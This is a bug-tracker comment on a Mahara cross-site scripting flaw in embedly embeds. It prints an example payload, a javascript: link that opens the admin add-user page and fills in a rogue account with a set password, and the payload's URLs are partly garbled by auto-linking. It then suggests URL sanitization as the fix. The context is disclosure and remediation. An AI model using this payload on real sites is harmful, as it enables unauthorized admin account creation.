Mahara

  1. Series 21.04
  2. Bug #1968920
  3. Comment #1

Comment 1 for bug 1968920

Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote :

Example exploit:

<a class="embedly-card" href="javascript: {var TestFenster = http://window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill);}">open the gate</a>

Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.

---------------------

Things to keep in mind:

- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61